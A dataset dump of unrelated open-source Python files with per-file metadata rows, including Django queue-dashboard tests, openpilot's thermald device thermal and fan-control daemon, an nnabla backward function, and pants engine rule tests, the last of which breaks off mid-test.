'command': 'ComputeRobotJointValuesForCommandVisualization',
'program': program,
'commandindex': commandindex,
}
taskparameters.update(kwargs)
return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout, fireandforget=fireandforget)
def PlotProgramWaypoints(self, usewebapi=False, timeout=1, fireandforget=True, **kwargs):
taskparameters = {
'command': 'PlotProgramWaypoints',
}
taskparameters.update(kwargs)
return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout, fireandforget=fireandforget)
| 53.594406 | 238 | 0.705506 |
bd9f8e1eb82fad69d71aa10f6ec871428fd3a70c | 5,919 | py | Python | wildcard/dashboards/project/queues/tests.py | kickstandproject/wildcard | 0ef2a15d8ac6b1d37db964d0baa7e40f9f771bc9 | [
"Apache-2.0"
] | 2 | 2015-03-04T18:55:24.000Z | 2021-04-20T23:27:19.000Z | wildcard/dashboards/project/queues/tests.py | kickstandproject/wildcard | 0ef2a15d8ac6b1d37db964d0baa7e40f9f771bc9 | [
"Apache-2.0"
] | null | null | null | wildcard/dashboards/project/queues/tests.py | kickstandproject/wildcard | 0ef2a15d8ac6b1d37db964d0baa7e40f9f771bc9 | [
"Apache-2.0"
] | null | null | null | # vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright 2012 NEC Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.core.urlresolvers import reverse # noqa
from django import http
from mox import IsA # noqa
from wildcard import api
from wildcard.test import helpers as test
INDEX_URL = reverse('horizon:project:queues:index')
CREATE_URL = reverse('horizon:project:queues:create')
UPDATE_URL = reverse('horizon:project:queues:update', args=[1])
class QueueTests(test.TestCase):
@test.create_stubs({api.payload: ('queue_list',)})
def test_index(self):
api.payload.queue_list(
IsA(http.HttpRequest)
).AndReturn(self.queues.list())
self.mox.ReplayAll()
res = self.client.get(INDEX_URL)
self.assertTemplateUsed(res, 'project/queues/index.html')
queues = res.context['queues_table'].data
self.assertItemsEqual(queues, self.queues.list())
def _test_create_successful(self, queue, create_args, post_data):
api.payload.queue_create(
IsA(http.HttpRequest),
**create_args
).AndReturn(queue)
self.mox.ReplayAll()
post_data['method'] = 'CreateQueueForm'
res = self.client.post(CREATE_URL, post_data)
self.assertNoFormErrors(res)
self.assertMessageCount(success=1)
def _test_update_successful(self, queue, update_args, post_data):
api.payload.queue_get(
IsA(http.HttpRequest),
queue.uuid,
).AndReturn(queue)
api.payload.queue_update(
IsA(http.HttpRequest),
queue.uuid,
**update_args
).AndReturn(None)
self.mox.ReplayAll()
post_data['method'] = 'UpdateQueueForm'
res = self.client.post(UPDATE_URL, post_data)
self.assertNoFormErrors(res)
self.assertMessageCount(success=1)
@test.create_stubs({api.payload: ('queue_create',)})
def test_create(self):
queue = self.queues.get(uuid='1')
self._test_create_successful(
queue,
{
'name': queue.name,
'description': queue.description,
},
{
'name': queue.name,
'description': queue.description,
},
)
@test.create_stubs({api.payload: ('queue_create',)})
def test_create_description_is_not_required(self):
queue = self.queues.get(uuid='1')
self._test_create_successful(
queue,
{
'name': queue.name,
'description': '',
},
{
'name': queue.name,
},
)
@test.create_stubs({api.payload: ('queue_get', 'queue_update')})
def test_update(self):
queue = self.queues.get(uuid='1')
self._test_update_successful(
queue,
{
'name': queue.name,
'description': queue.description,
},
{
'uuid': queue.uuid,
'name': queue.name,
'description': queue.description,
},
)
@test.create_stubs({api.payload: ('queue_get', 'queue_update')})
def test_update_description_not_required(self):
queue = self.queues.get(uuid='1')
self._test_update_successful(
queue,
{
'name': queue.name,
'description': '',
},
{
'uuid': queue.uuid,
'name': queue.name,
},
)
@test.create_stubs({api.payload: ('queue_delete', 'queue_list')})
def test_delete(self):
uuid = '1'
api.payload.queue_delete(
IsA(http.HttpRequest),
uuid,
)
api.payload.queue_list(
IsA(http.HttpRequest),
).AndReturn(self.queues.list())
self.mox.ReplayAll()
form_data = {'action': 'queues__delete__%s' % uuid}
res = self.client.post(INDEX_URL, form_data)
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.create_stubs({api.payload: ('queue_update', 'queue_list')})
def test_enable_queue(self):
queue = self.queues.get(uuid="1")
queue.disabled = True
api.payload.queue_list(
IsA(http.HttpRequest),
).AndReturn(self.queues.list())
api.payload.queue_update(
IsA(http.HttpRequest),
queue.uuid,
disabled=False
).AndReturn(None)
self.mox.ReplayAll()
formData = {'action': 'queues__toggle__%s' % queue.uuid}
res = self.client.post(INDEX_URL, formData)
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.create_stubs({api.payload: ('queue_update', 'queue_list')})
def test_disable_queue(self):
queue = self.queues.get(uuid="1")
queue.disabled = False
api.payload.queue_list(
IsA(http.HttpRequest),
).AndReturn(self.queues.list())
api.payload.queue_update(
IsA(http.HttpRequest),
queue.uuid,
disabled=True
).AndReturn(None)
self.mox.ReplayAll()
formData = {'action': 'queues__toggle__%s' % queue.uuid}
res = self.client.post(INDEX_URL, formData)
self.assertRedirectsNoFollow(res, INDEX_URL)
| 30.353846 | 78 | 0.585065 |
5a6b78dac2bf2c1fd9385940027aa4b8ff721891 | 17,719 | py | Python | selfdrive/thermald/thermald.py | tobylinjs/openpilot | 6c525691e9943cb88096b1d94c1c29cc4b22369f | [
"MIT"
] | 1 | 2020-09-04T00:41:47.000Z | 2020-09-04T00:41:47.000Z | selfdrive/thermald/thermald.py | tobylinjs/openpilot | 6c525691e9943cb88096b1d94c1c29cc4b22369f | [
"MIT"
] | null | null | null | selfdrive/thermald/thermald.py | tobylinjs/openpilot | 6c525691e9943cb88096b1d94c1c29cc4b22369f | [
"MIT"
] | 2 | 2020-11-30T23:10:07.000Z | 2020-12-01T15:53:03.000Z | #!/usr/bin/env python3
import datetime
import os
import time
from collections import namedtuple
import psutil
from smbus2 import SMBus
import cereal.messaging as messaging
from cereal import log
from common.filter_simple import FirstOrderFilter
from common.hardware import EON, HARDWARE, TICI
from common.numpy_fast import clip, interp
from common.params import Params, put_nonblocking
from common.realtime import DT_TRML, sec_since_boot
from selfdrive.controls.lib.alertmanager import set_offroad_alert
from selfdrive.loggerd.config import get_available_percent
from selfdrive.pandad import get_expected_signature
from selfdrive.swaglog import cloudlog
from selfdrive.thermald.power_monitoring import (PowerMonitoring,
get_battery_capacity,
get_battery_current,
get_battery_status,
get_battery_voltage,
get_usb_present)
from selfdrive.version import get_git_branch, terms_version, training_version
ThermalConfig = namedtuple('ThermalConfig', ['cpu', 'gpu', 'mem', 'bat', 'ambient'])
FW_SIGNATURE = get_expected_signature()
ThermalStatus = log.ThermalData.ThermalStatus
NetworkType = log.ThermalData.NetworkType
NetworkStrength = log.ThermalData.NetworkStrength
CURRENT_TAU = 15. # 15s time constant
CPU_TEMP_TAU = 5. # 5s time constant
DAYS_NO_CONNECTIVITY_MAX = 7 # do not allow to engage after a week without internet
DAYS_NO_CONNECTIVITY_PROMPT = 4 # send an offroad prompt after 4 days with no internet
DISCONNECT_TIMEOUT = 5. # wait 5 seconds before going offroad after disconnect so you get an alert
LEON = False
last_eon_fan_val = None
def get_thermal_config():
# (tz, scale)
if EON:
return ThermalConfig(cpu=((5, 7, 10, 12), 10), gpu=((16,), 10), mem=(2, 10), bat=(29, 1000), ambient=(25, 1))
elif TICI:
return ThermalConfig(cpu=((1, 2, 3, 4, 5, 6, 7, 8), 1000), gpu=((48,49), 1000), mem=(15, 1000), bat=(None, 1), ambient=(70, 1000))
else:
return ThermalConfig(cpu=((None,), 1), gpu=((None,), 1), mem=(None, 1), bat=(None, 1), ambient=(None, 1))
def read_tz(x):
if x is None:
return 0
try:
with open("/sys/devices/virtual/thermal/thermal_zone%d/temp" % x) as f:
return int(f.read())
except FileNotFoundError:
return 0
def read_thermal(thermal_config):
dat = messaging.new_message('thermal')
dat.thermal.cpu = [read_tz(z) / thermal_config.cpu[1] for z in thermal_config.cpu[0]]
dat.thermal.gpu = [read_tz(z) / thermal_config.gpu[1] for z in thermal_config.gpu[0]]
dat.thermal.mem = read_tz(thermal_config.mem[0]) / thermal_config.mem[1]
dat.thermal.ambient = read_tz(thermal_config.ambient[0]) / thermal_config.ambient[1]
dat.thermal.bat = read_tz(thermal_config.bat[0]) / thermal_config.bat[1]
return dat
def setup_eon_fan():
global LEON
os.system("echo 2 > /sys/module/dwc3_msm/parameters/otg_switch")
bus = SMBus(7, force=True)
try:
bus.write_byte_data(0x21, 0x10, 0xf) # mask all interrupts
bus.write_byte_data(0x21, 0x03, 0x1) # set drive current and global interrupt disable
bus.write_byte_data(0x21, 0x02, 0x2) # needed?
bus.write_byte_data(0x21, 0x04, 0x4) # manual override source
except IOError:
print("LEON detected")
LEON = True
bus.close()
def set_eon_fan(val):
global LEON, last_eon_fan_val
if last_eon_fan_val is None or last_eon_fan_val != val:
bus = SMBus(7, force=True)
if LEON:
try:
i = [0x1, 0x3 | 0, 0x3 | 0x08, 0x3 | 0x10][val]
bus.write_i2c_block_data(0x3d, 0, [i])
except IOError:
# tusb320
if val == 0:
bus.write_i2c_block_data(0x67, 0xa, [0])
#bus.write_i2c_block_data(0x67, 0x45, [1<<2])
else:
#bus.write_i2c_block_data(0x67, 0x45, [0])
bus.write_i2c_block_data(0x67, 0xa, [0x20])
bus.write_i2c_block_data(0x67, 0x8, [(val - 1) << 6])
else:
bus.write_byte_data(0x21, 0x04, 0x2)
bus.write_byte_data(0x21, 0x03, (val*2)+1)
bus.write_byte_data(0x21, 0x04, 0x4)
bus.close()
last_eon_fan_val = val
# temp thresholds to control fan speed - high hysteresis
_TEMP_THRS_H = [50., 65., 80., 10000]
# temp thresholds to control fan speed - low hysteresis
_TEMP_THRS_L = [42.5, 57.5, 72.5, 10000]
# fan speed options
_FAN_SPEEDS = [0, 16384, 32768, 65535]
# max fan speed only allowed if battery is hot
_BAT_TEMP_THERSHOLD = 45.
def handle_fan_eon(max_cpu_temp, bat_temp, fan_speed, ignition):
new_speed_h = next(speed for speed, temp_h in zip(_FAN_SPEEDS, _TEMP_THRS_H) if temp_h > max_cpu_temp)
new_speed_l = next(speed for speed, temp_l in zip(_FAN_SPEEDS, _TEMP_THRS_L) if temp_l > max_cpu_temp)
if new_speed_h > fan_speed:
# update speed if using the high thresholds results in fan speed increment
fan_speed = new_speed_h
elif new_speed_l < fan_speed:
# update speed if using the low thresholds results in fan speed decrement
fan_speed = new_speed_l
if bat_temp < _BAT_TEMP_THERSHOLD:
# no max fan speed unless battery is hot
fan_speed = min(fan_speed, _FAN_SPEEDS[-2])
set_eon_fan(fan_speed // 16384)
return fan_speed
def handle_fan_uno(max_cpu_temp, bat_temp, fan_speed, ignition):
new_speed = int(interp(max_cpu_temp, [40.0, 80.0], [0, 80]))
if not ignition:
new_speed = min(30, new_speed)
return new_speed
def thermald_thread():
health_timeout = int(1000 * 2.5 * DT_TRML) # 2.5x the expected health frequency
# now loop
thermal_sock = messaging.pub_sock('thermal')
health_sock = messaging.sub_sock('health', timeout=health_timeout)
location_sock = messaging.sub_sock('gpsLocation')
ignition = False
fan_speed = 0
count = 0
off_ts = None
started_ts = None
started_seen = False
thermal_status = ThermalStatus.green
thermal_status_prev = ThermalStatus.green
usb_power = True
usb_power_prev = True
current_branch = get_git_branch()
network_type = NetworkType.none
network_strength = NetworkStrength.unknown
current_filter = FirstOrderFilter(0., CURRENT_TAU, DT_TRML)
cpu_temp_filter = FirstOrderFilter(0., CPU_TEMP_TAU, DT_TRML)
health_prev = None
fw_version_match_prev = True
current_update_alert = None
time_valid_prev = True
should_start_prev = False
handle_fan = None
is_uno = False
has_relay = False
params = Params()
pm = PowerMonitoring()
no_panda_cnt = 0
thermal_config = get_thermal_config()
while 1:
health = messaging.recv_sock(health_sock, wait=True)
location = messaging.recv_sock(location_sock)
location = location.gpsLocation if location else None
msg = read_thermal(thermal_config)
if health is not None:
usb_power = health.health.usbPowerMode != log.HealthData.UsbPowerMode.client
# If we lose connection to the panda, wait 5 seconds before going offroad
if health.health.hwType == log.HealthData.HwType.unknown:
no_panda_cnt += 1
if no_panda_cnt > DISCONNECT_TIMEOUT / DT_TRML:
if ignition:
cloudlog.error("Lost panda connection while onroad")
ignition = False
else:
no_panda_cnt = 0
ignition = health.health.ignitionLine or health.health.ignitionCan
# Setup fan handler on first connect to panda
if handle_fan is None and health.health.hwType != log.HealthData.HwType.unknown:
is_uno = health.health.hwType == log.HealthData.HwType.uno
has_relay = health.health.hwType in [log.HealthData.HwType.blackPanda, log.HealthData.HwType.uno, log.HealthData.HwType.dos]
if (not EON) or is_uno:
cloudlog.info("Setting up UNO fan handler")
handle_fan = handle_fan_uno
else:
cloudlog.info("Setting up EON fan handler")
setup_eon_fan()
handle_fan = handle_fan_eon
# Handle disconnect
if health_prev is not None:
if health.health.hwType == log.HealthData.HwType.unknown and \
health_prev.health.hwType != log.HealthData.HwType.unknown:
params.panda_disconnect()
health_prev = health
# get_network_type is an expensive call. update every 10s
if (count % int(10. / DT_TRML)) == 0:
try:
network_type = HARDWARE.get_network_type()
network_strength = HARDWARE.get_network_strength(network_type)
except Exception:
cloudlog.exception("Error getting network status")
msg.thermal.freeSpace = get_available_percent(default=100.0) / 100.0
msg.thermal.memUsedPercent = int(round(psutil.virtual_memory().percent))
msg.thermal.cpuPerc = int(round(psutil.cpu_percent()))
msg.thermal.networkType = network_type
msg.thermal.networkStrength = network_strength
msg.thermal.batteryPercent = get_battery_capacity()
msg.thermal.batteryStatus = get_battery_status()
msg.thermal.batteryCurrent = get_battery_current()
msg.thermal.batteryVoltage = get_battery_voltage()
msg.thermal.usbOnline = get_usb_present()
# Fake battery levels on uno for frame
if (not EON) or is_uno:
msg.thermal.batteryPercent = 100
msg.thermal.batteryStatus = "Charging"
msg.thermal.bat = 0
current_filter.update(msg.thermal.batteryCurrent / 1e6)
# TODO: add car battery voltage check
max_cpu_temp = cpu_temp_filter.update(max(msg.thermal.cpu))
max_comp_temp = max(max_cpu_temp, msg.thermal.mem, max(msg.thermal.gpu))
bat_temp = msg.thermal.bat
if handle_fan is not None:
fan_speed = handle_fan(max_cpu_temp, bat_temp, fan_speed, ignition)
msg.thermal.fanSpeed = fan_speed
# If device is offroad we want to cool down before going onroad
# since going onroad increases load and can make temps go over 107
# We only do this if there is a relay that prevents the car from faulting
is_offroad_for_5_min = (started_ts is None) and ((not started_seen) or (off_ts is None) or (sec_since_boot() - off_ts > 60 * 5))
if max_cpu_temp > 107. or bat_temp >= 63. or (has_relay and is_offroad_for_5_min and max_cpu_temp > 70.0):
# onroad not allowed
thermal_status = ThermalStatus.danger
elif max_comp_temp > 96.0 or bat_temp > 60.:
# hysteresis between onroad not allowed and engage not allowed
thermal_status = clip(thermal_status, ThermalStatus.red, ThermalStatus.danger)
elif max_cpu_temp > 94.0:
# hysteresis between engage not allowed and uploader not allowed
thermal_status = clip(thermal_status, ThermalStatus.yellow, ThermalStatus.red)
elif max_cpu_temp > 80.0:
# uploader not allowed
thermal_status = ThermalStatus.yellow
elif max_cpu_temp > 75.0:
# hysteresis between uploader not allowed and all good
thermal_status = clip(thermal_status, ThermalStatus.green, ThermalStatus.yellow)
else:
# all good
thermal_status = ThermalStatus.green
# **** starting logic ****
# Check for last update time and display alerts if needed
now = datetime.datetime.utcnow()
# show invalid date/time alert
time_valid = now.year >= 2019
if time_valid and not time_valid_prev:
set_offroad_alert("Offroad_InvalidTime", False)
if not time_valid and time_valid_prev:
set_offroad_alert("Offroad_InvalidTime", True)
time_valid_prev = time_valid
# Show update prompt
try:
last_update = datetime.datetime.fromisoformat(params.get("LastUpdateTime", encoding='utf8'))
except (TypeError, ValueError):
last_update = now
dt = now - last_update
update_failed_count = params.get("UpdateFailedCount")
update_failed_count = 0 if update_failed_count is None else int(update_failed_count)
last_update_exception = params.get("LastUpdateException", encoding='utf8')
if update_failed_count > 15 and last_update_exception is not None:
if current_branch in ["release2", "dashcam"]:
extra_text = "Ensure the software is correctly installed"
else:
extra_text = last_update_exception
if current_update_alert != "update" + extra_text:
current_update_alert = "update" + extra_text
set_offroad_alert("Offroad_ConnectivityNeeded", False)
set_offroad_alert("Offroad_ConnectivityNeededPrompt", False)
set_offroad_alert("Offroad_UpdateFailed", True, extra_text=extra_text)
elif dt.days > DAYS_NO_CONNECTIVITY_MAX and update_failed_count > 1:
if current_update_alert != "expired":
current_update_alert = "expired"
set_offroad_alert("Offroad_UpdateFailed", False)
set_offroad_alert("Offroad_ConnectivityNeededPrompt", False)
set_offroad_alert("Offroad_ConnectivityNeeded", True)
elif dt.days > DAYS_NO_CONNECTIVITY_PROMPT:
remaining_time = str(max(DAYS_NO_CONNECTIVITY_MAX - dt.days, 0))
if current_update_alert != "prompt" + remaining_time:
current_update_alert = "prompt" + remaining_time
set_offroad_alert("Offroad_UpdateFailed", False)
set_offroad_alert("Offroad_ConnectivityNeeded", False)
set_offroad_alert("Offroad_ConnectivityNeededPrompt", True, extra_text=f"{remaining_time} days.")
elif current_update_alert is not None:
current_update_alert = None
set_offroad_alert("Offroad_UpdateFailed", False)
set_offroad_alert("Offroad_ConnectivityNeeded", False)
set_offroad_alert("Offroad_ConnectivityNeededPrompt", False)
do_uninstall = params.get("DoUninstall") == b"1"
accepted_terms = params.get("HasAcceptedTerms") == terms_version
completed_training = params.get("CompletedTrainingVersion") == training_version
panda_signature = params.get("PandaFirmware")
fw_version_match = (panda_signature is None) or (panda_signature == FW_SIGNATURE) # don't show alert is no panda is connected (None)
should_start = ignition
# with 2% left, we killall, otherwise the phone will take a long time to boot
should_start = should_start and msg.thermal.freeSpace > 0.02
# confirm we have completed training and aren't uninstalling
should_start = should_start and accepted_terms and completed_training and (not do_uninstall)
# check for firmware mismatch
should_start = should_start and fw_version_match
# check if system time is valid
should_start = should_start and time_valid
# don't start while taking snapshot
if not should_start_prev:
is_viewing_driver = params.get("IsDriverViewEnabled") == b"1"
is_taking_snapshot = params.get("IsTakingSnapshot") == b"1"
should_start = should_start and (not is_taking_snapshot) and (not is_viewing_driver)
if fw_version_match and not fw_version_match_prev:
set_offroad_alert("Offroad_PandaFirmwareMismatch", False)
if not fw_version_match and fw_version_match_prev:
set_offroad_alert("Offroad_PandaFirmwareMismatch", True)
# if any CPU gets above 107 or the battery gets above 63, kill all processes
# controls will warn with CPU above 95 or battery above 60
if thermal_status >= ThermalStatus.danger:
should_start = False
if thermal_status_prev < ThermalStatus.danger:
set_offroad_alert("Offroad_TemperatureTooHigh", True)
else:
if thermal_status_prev >= ThermalStatus.danger:
set_offroad_alert("Offroad_TemperatureTooHigh", False)
if should_start:
if not should_start_prev:
params.delete("IsOffroad")
off_ts = None
if started_ts is None:
started_ts = sec_since_boot()
started_seen = True
os.system('echo performance > /sys/class/devfreq/soc:qcom,cpubw/governor')
else:
if should_start_prev or (count == 0):
put_nonblocking("IsOffroad", "1")
started_ts = None
if off_ts is None:
off_ts = sec_since_boot()
os.system('echo powersave > /sys/class/devfreq/soc:qcom,cpubw/governor')
# Offroad power monitoring
pm.calculate(health)
msg.thermal.offroadPowerUsage = pm.get_power_used()
msg.thermal.carBatteryCapacity = max(0, pm.get_car_battery_capacity())
# Check if we need to disable charging (handled by boardd)
msg.thermal.chargingDisabled = pm.should_disable_charging(health, off_ts)
# Check if we need to shut down
if pm.should_shutdown(health, off_ts, started_seen, LEON):
cloudlog.info(f"shutting device down, offroad since {off_ts}")
# TODO: add function for blocking cloudlog instead of sleep
time.sleep(10)
os.system('LD_LIBRARY_PATH="" svc power shutdown')
msg.thermal.chargingError = current_filter.x > 0. and msg.thermal.batteryPercent < 90 # if current is positive, then battery is being discharged
msg.thermal.started = started_ts is not None
msg.thermal.startedTs = int(1e9*(started_ts or 0))
msg.thermal.thermalStatus = thermal_status
thermal_sock.send(msg.to_bytes())
if usb_power_prev and not usb_power:
set_offroad_alert("Offroad_ChargeDisabled", True)
elif usb_power and not usb_power_prev:
set_offroad_alert("Offroad_ChargeDisabled", False)
thermal_status_prev = thermal_status
usb_power_prev = usb_power
fw_version_match_prev = fw_version_match
should_start_prev = should_start
# report to server once per minute
if (count % int(60. / DT_TRML)) == 0:
cloudlog.event("STATUS_PACKET",
count=count,
health=(health.to_dict() if health else None),
location=(location.to_dict() if location else None),
thermal=msg.to_dict())
count += 1
def main():
thermald_thread()
if __name__ == "__main__":
main()
| 38.352814 | 149 | 0.706925 |
e36a45ad1cdcd939f1297508c9bf9d67ed438dd7 | 1,799 | py | Python | python/src/nnabla/backward_function/sink.py | sdonatti/nnabla | ac4a42e62dd358f16bd79c08a9a9f3d83c0100c9 | [
"Apache-2.0"
] | 1 | 2020-08-03T12:49:19.000Z | 2020-08-03T12:49:19.000Z | python/src/nnabla/backward_function/sink.py | sdonatti/nnabla | ac4a42e62dd358f16bd79c08a9a9f3d83c0100c9 | [
"Apache-2.0"
] | 1 | 2020-11-09T07:33:29.000Z | 2020-11-09T07:33:29.000Z | python/src/nnabla/backward_function/sink.py | sdonatti/nnabla | ac4a42e62dd358f16bd79c08a9a9f3d83c0100c9 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2017 Sony Corporation. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import nnabla as nn
from .backward_function import BackwardFunction
class SinkBackward(BackwardFunction):
@property
def name(self):
return 'SinkBackward'
def _create_forward_inputs_and_outputs(self, inputs, outputs):
# Inputs on the forward graph
inputs_fwd = []
for i in range(self._num_inputs_fwd):
need_grad = self.forward_func.inputs[i].need_grad
v = nn.Variable(inputs[i].shape, need_grad=need_grad)
v.data = inputs[i].data
v.grad = outputs[i].data
inputs_fwd += [v]
# Outputs on the forward graph
outputs_fwd = []
for i in range(self._num_outputs_fwd):
inp = inputs[self._num_inputs_fwd + i]
v = nn.Variable(inp.shape)
v.grad = inp.data
outputs_fwd += [v]
return inputs_fwd, outputs_fwd
def backward_impl(self, inputs, outputs, prop_down, accum):
# inputs: [inputs_fwd_graph] + [inputs_bwd_graph] or
# [inputs_fwd_graph] + [outputs_fwd_graph] + [inputs_bwd_graph]
raise NotImplementedError(
"The backward method of SinkBackward class is not implemented.")
| 36.714286 | 76 | 0.673152 |
4c9f88d00244732bb4cd7fca0243fb3cea38ba14 | 27 | py | Python | python/hpctl/hpctl/version.py | domyounglee/baseline | 2261abfb7e770cc6f3d63a7f6e0015238d0e11f8 | [
"Apache-2.0"
] | 24 | 2018-08-06T07:31:48.000Z | 2021-04-13T07:49:43.000Z | python/hpctl/hpctl/version.py | domyounglee/baseline | 2261abfb7e770cc6f3d63a7f6e0015238d0e11f8 | [
"Apache-2.0"
] | 3 | 2019-04-20T14:08:57.000Z | 2020-03-30T08:27:17.000Z | python/hpctl/hpctl/version.py | domyounglee/baseline | 2261abfb7e770cc6f3d63a7f6e0015238d0e11f8 | [
"Apache-2.0"
] | 3 | 2019-04-20T14:11:27.000Z | 2020-12-17T10:45:19.000Z | __version__ = '0.2.0.dev0'
| 13.5 | 26 | 0.666667 |
127b9ba8d75c8425aa1a218318c86ebb10f44606 | 185 | py | Python | tests/conftest.py | tdcoa/usage | 408091f77360fe29e14186b60746fd7d60713e42 | [
"MIT"
] | null | null | null | tests/conftest.py | tdcoa/usage | 408091f77360fe29e14186b60746fd7d60713e42 | [
"MIT"
] | 4 | 2020-07-21T18:42:22.000Z | 2020-10-14T00:50:45.000Z | tests/conftest.py | tdcoa/usage | 408091f77360fe29e14186b60746fd7d60713e42 | [
"MIT"
] | 1 | 2020-08-05T20:09:41.000Z | 2020-08-05T20:09:41.000Z | "global setup including fixtures"
from pathlib import Path
import pytest
@pytest.fixture(scope="session")
def testdir(request) -> Path:
return Path(request.config.rootdir) / "tests"
| 20.555556 | 46 | 0.767568 |
c72d1c2694be4a98e46359aac7b3cf28adb43f86 | 23,314 | py | Python | tests/python/pants_test/engine/test_rules.py | pall-valmundsson/pants | 434533ad83d6b3e88723829a28b9b42f80f1cc09 | [
"Apache-2.0"
] | null | null | null | tests/python/pants_test/engine/test_rules.py | pall-valmundsson/pants | 434533ad83d6b3e88723829a28b9b42f80f1cc09 | [
"Apache-2.0"
] | null | null | null | tests/python/pants_test/engine/test_rules.py | pall-valmundsson/pants | 434533ad83d6b3e88723829a28b9b42f80f1cc09 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import absolute_import, division, print_function, unicode_literals
import re
import sys
import unittest
from builtins import object, str
from textwrap import dedent
from pants.engine.build_files import create_graph_rules
from pants.engine.console import Console
from pants.engine.fs import create_fs_rules
from pants.engine.mapper import AddressMapper
from pants.engine.rules import (RootRule, RuleIndex, SingletonRule, _GoalProduct, _RuleVisitor,
console_rule, rule)
from pants.engine.selectors import Get, Select
from pants.util.objects import Exactly
from pants_test.engine.examples.parsers import JsonParser
from pants_test.engine.util import (TargetTable, assert_equal_with_printing, create_scheduler,
run_rule)
class A(object):
def __repr__(self):
return 'A()'
class B(object):
def __repr__(self):
return 'B()'
class C(object):
def __repr__(self):
return 'C()'
class D(object):
def __repr__(self):
return 'D()'
def noop(*args):
pass
class SubA(A):
def __repr__(self):
return 'SubA()'
_suba_root_rules = [RootRule(SubA)]
@console_rule('example', [Select(Console)])
def a_console_rule_generator(console):
a = yield Get(A, str('a str!'))
console.print_stdout(str(a))
class RuleTest(unittest.TestCase):
def test_run_rule_console_rule_generator(self):
res = run_rule(a_console_rule_generator, Console(), {
(A, str): lambda _: A(),
})
self.assertEquals(res, _GoalProduct.for_name('example')())
class RuleIndexTest(unittest.TestCase):
def test_creation_fails_with_bad_declaration_type(self):
with self.assertRaises(TypeError) as cm:
RuleIndex.create([A()])
self.assertEqual("Unexpected rule type: <class 'pants_test.engine.test_rules.A'>."
" Rules either extend Rule, or are static functions decorated with @rule.",
str(cm.exception))
class RulesetValidatorTest(unittest.TestCase):
def test_ruleset_with_missing_product_type(self):
@rule(A, [Select(B)])
def a_from_b_noop(b):
pass
rules = _suba_root_rules + [a_from_b_noop]
with self.assertRaises(Exception) as cm:
create_scheduler(rules)
self.assert_equal_with_printing(dedent("""
Rules with errors: 1
(A, [Select(B)], a_from_b_noop):
No rule was available to compute B with parameter type SubA
""").strip(),
str(cm.exception))
def test_ruleset_with_ambiguity(self):
@rule(A, [Select(C), Select(B)])
def a_from_c_and_b(c, b):
pass
@rule(A, [Select(B), Select(C)])
def a_from_b_and_c(b, c):
pass
@rule(D, [Select(A)])
def d_from_a(a):
pass
rules = [
a_from_c_and_b,
a_from_b_and_c,
RootRule(B),
RootRule(C),
# TODO: Without a rule triggering the selection of A, we don't detect ambiguity here.
d_from_a,
]
with self.assertRaises(Exception) as cm:
create_scheduler(rules)
self.assert_equal_with_printing(dedent("""
Rules with errors: 1
(D, [Select(A)], d_from_a):
ambiguous rules for Select(A) with parameter types (B+C):
(A, [Select(B), Select(C)], a_from_b_and_c) for (B+C)
(A, [Select(C), Select(B)], a_from_c_and_b) for (B+C)
""").strip(),
str(cm.exception))
def test_ruleset_with_rule_with_two_missing_selects(self):
@rule(A, [Select(B), Select(C)])
def a_from_b_and_c(b, c):
pass
rules = _suba_root_rules + [a_from_b_and_c]
with self.assertRaises(Exception) as cm:
create_scheduler(rules)
self.assert_equal_with_printing(dedent("""
Rules with errors: 1
(A, [Select(B), Select(C)], a_from_b_and_c):
No rule was available to compute B with parameter type SubA
No rule was available to compute C with parameter type SubA
""").strip(),
str(cm.exception))
def test_ruleset_with_selector_only_provided_as_root_subject(self):
@rule(A, [Select(B)])
def a_from_b(b):
pass
rules = [RootRule(B), a_from_b]
create_scheduler(rules)
def test_ruleset_with_superclass_of_selected_type_produced_fails(self):
@rule(A, [Select(B)])
def a_from_b(b):
pass
@rule(B, [Select(SubA)])
def b_from_suba(suba):
pass
rules = [
RootRule(C),
a_from_b,
b_from_suba,
]
with self.assertRaises(Exception) as cm:
create_scheduler(rules)
self.assert_equal_with_printing(dedent("""
Rules with errors: 2
(A, [Select(B)], a_from_b):
No rule was available to compute B with parameter type C
(B, [Select(SubA)], b_from_suba):
No rule was available to compute SubA with parameter type C
""").strip(),
str(cm.exception))
def test_ruleset_with_explicit_type_constraint(self):
@rule(Exactly(A), [Select(B)])
def a_from_b(b):
pass
@rule(B, [Select(A)])
def b_from_a(a):
pass
rules = _suba_root_rules + [
a_from_b,
b_from_a,
]
create_scheduler(rules)
def test_ruleset_with_failure_due_to_incompatible_subject_for_singleton(self):
@rule(D, [Select(C)])
def d_from_c(c):
pass
rules = [
RootRule(A),
d_from_c,
SingletonRule(B, B()),
]
with self.assertRaises(Exception) as cm:
create_scheduler(rules)
# This error message could note near matches like the singleton.
self.assert_equal_with_printing(dedent("""
Rules with errors: 1
(D, [Select(C)], d_from_c):
No rule was available to compute C with parameter type A
""").strip(),
str(cm.exception))
def test_not_fulfillable_duplicated_dependency(self):
# If a rule depends on another rule+subject in two ways, and one of them is unfulfillable
# Only the unfulfillable one should be in the errors.
@rule(B, [Select(D)])
def b_from_d(d):
pass
@rule(D, [Select(A), Select(SubA)])
def d_from_a_and_suba(a, suba):
_ = yield Get(A, C, C()) # noqa: F841
@rule(A, [Select(C)])
def a_from_c(c):
pass
